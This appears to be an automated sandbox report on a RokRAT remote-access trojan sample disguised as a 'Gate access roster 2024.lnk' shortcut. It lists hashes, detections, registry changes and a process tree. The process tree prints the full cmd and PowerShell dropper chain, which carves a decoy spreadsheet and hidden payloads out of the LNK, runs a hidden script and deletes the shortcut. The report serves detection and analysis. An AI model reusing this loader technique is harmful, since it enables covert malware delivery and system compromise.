rokrat | c25e5e87d1e665197209e7aaec64e484ce30e2dabcc9e457c5593ac6c7bb5686

Analysis

max time kernel
148s
max time network
149s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09-04-2024 05:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Gate access roster 2024.lnk
Size

40.0MB
MD5

e4ddd5cc8b5f4d791f27d676d809f668
SHA1

506ffe6a5bb460ec943ee247c280de1dbe1775bf
SHA256

c25e5e87d1e665197209e7aaec64e484ce30e2dabcc9e457c5593ac6c7bb5686
SHA512

c59da52f56d84b1ef9d1d191978d3ba04267f4a661fd8f73f73e2c52cd70433f6b0f9ea977ad879dc4e44930789dce5765865e0b9d2a922888fc4b7c7222db9a
SSDEEP

24576:/gRXTTYdy830QmOpIDjW7sFAcXMh5X2wV:/gj4CDa7n2wV

Score

10^/10

rokrat rat

Malware Config

Signatures

Detect Rokrat payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2748-133-0x000000000C520000-0x000000000C603000-memory.dmp	family_rokrat
behavioral1/memory/2748-134-0x000000000C520000-0x000000000C603000-memory.dmp	family_rokrat

Rokrat
Rokrat is a remote access trojan written in c++.
rat rokrat

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exe

flow	pid	process
3	2748	powershell.exe
4	2748	powershell.exe
5	2748	powershell.exe
6	2748	powershell.exe
7	2748	powershell.exe
8	2748	powershell.exe
10	2748	powershell.exe
12	2748	powershell.exe
13	2748	powershell.exe
15	2748	powershell.exe
16	2748	powershell.exe
18	2748	powershell.exe

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

powershell.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2588 powershell.exe
Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\7259.dat powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	powershell.exe

pid	process
2588	powershell.exe

description	ioc	process
File created	C:\Windows\7259.dat	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2188 EXCEL.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

cmd.exe

pid process

2604 cmd.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2588 powershell.exe
2748 powershell.exe
2748 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2588 powershell.exe
Token: SeDebugPrivilege 2748 powershell.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid process

2188 EXCEL.EXE
2188 EXCEL.EXE
2188 EXCEL.EXE

pid	process
2188	EXCEL.EXE

pid	process
2604	cmd.exe

pid	process
2588	powershell.exe
2748	powershell.exe
2748	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe

pid	process
2188	EXCEL.EXE
2188	EXCEL.EXE
2188	EXCEL.EXE

Suspicious use of WriteProcessMemory 61 IoCs

Processes:

cmd.execmd.exepowershell.execmd.exepowershell.execsc.execsc.execsc.execsc.exe

description	pid	process	target process
PID 2320 wrote to memory of 2604	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 2604	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 2604	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 2604	2320	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2688	2604	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2688	2604	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2688	2604	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2688	2604	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2588	2604	cmd.exe	powershell.exe
PID 2604 wrote to memory of 2588	2604	cmd.exe	powershell.exe
PID 2604 wrote to memory of 2588	2604	cmd.exe	powershell.exe
PID 2604 wrote to memory of 2588	2604	cmd.exe	powershell.exe
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2188	2588	powershell.exe	EXCEL.EXE
PID 2588 wrote to memory of 2708	2588	powershell.exe	cmd.exe
PID 2588 wrote to memory of 2708	2588	powershell.exe	cmd.exe
PID 2588 wrote to memory of 2708	2588	powershell.exe	cmd.exe
PID 2588 wrote to memory of 2708	2588	powershell.exe	cmd.exe
PID 2708 wrote to memory of 2748	2708	cmd.exe	powershell.exe
PID 2708 wrote to memory of 2748	2708	cmd.exe	powershell.exe
PID 2708 wrote to memory of 2748	2708	cmd.exe	powershell.exe
PID 2708 wrote to memory of 2748	2708	cmd.exe	powershell.exe
PID 2748 wrote to memory of 1596	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 1596	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 1596	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 1596	2748	powershell.exe	csc.exe
PID 1596 wrote to memory of 1180	1596	csc.exe	cvtres.exe
PID 1596 wrote to memory of 1180	1596	csc.exe	cvtres.exe
PID 1596 wrote to memory of 1180	1596	csc.exe	cvtres.exe
PID 1596 wrote to memory of 1180	1596	csc.exe	cvtres.exe
PID 2748 wrote to memory of 1664	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 1664	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 1664	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 1664	2748	powershell.exe	csc.exe
PID 1664 wrote to memory of 2436	1664	csc.exe	cvtres.exe
PID 1664 wrote to memory of 2436	1664	csc.exe	cvtres.exe
PID 1664 wrote to memory of 2436	1664	csc.exe	cvtres.exe
PID 1664 wrote to memory of 2436	1664	csc.exe	cvtres.exe
PID 2748 wrote to memory of 672	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 672	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 672	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 672	2748	powershell.exe	csc.exe
PID 672 wrote to memory of 1120	672	csc.exe	cvtres.exe
PID 672 wrote to memory of 1120	672	csc.exe	cvtres.exe
PID 672 wrote to memory of 1120	672	csc.exe	cvtres.exe
PID 672 wrote to memory of 1120	672	csc.exe	cvtres.exe
PID 2748 wrote to memory of 844	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 844	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 844	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 844	2748	powershell.exe	csc.exe
PID 844 wrote to memory of 1084	844	csc.exe	cvtres.exe
PID 844 wrote to memory of 1084	844	csc.exe	cvtres.exe
PID 844 wrote to memory of 1084	844	csc.exe	cvtres.exe
PID 844 wrote to memory of 1084	844	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Gate access roster 2024.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0280216D} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010A4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00002E32;$lnkFile.Read($pdfFile, 0, 0x00002E32); $pdfPath = $lnkPath.replace('.lnk','.xlsx');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x00003ED6,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'viewer.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x000DD2D8,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:public+'\'+'search.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii; $lnkFile.Seek(0x000DD882,[System.IO.SeekOrigin]::Begin); $batByte = New-Object byte[] 0x00000139;$lnkFile.Read($batByte, 0, 0x00000139);$executePath = $env:public+'\'+'find.bat'; Write-Host $executePath; Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
3⤵
PID:2688

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0280216D} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010A4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00002E32;$lnkFile.Read($pdfFile, 0, 0x00002E32); $pdfPath = $lnkPath.replace('.lnk','.xlsx');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x00003ED6,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'viewer.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x000DD2D8,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:public+'\'+'search.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii; $lnkFile.Seek(0x000DD882,[System.IO.SeekOrigin]::Begin); $batByte = New-Object byte[] 0x00000139;$lnkFile.Read($batByte, 0, 0x00000139);$executePath = $env:public+'\'+'find.bat'; Write-Host $executePath; Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
3⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2588

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
4⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2188

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\find.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:public+'\'+'search.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
5⤵
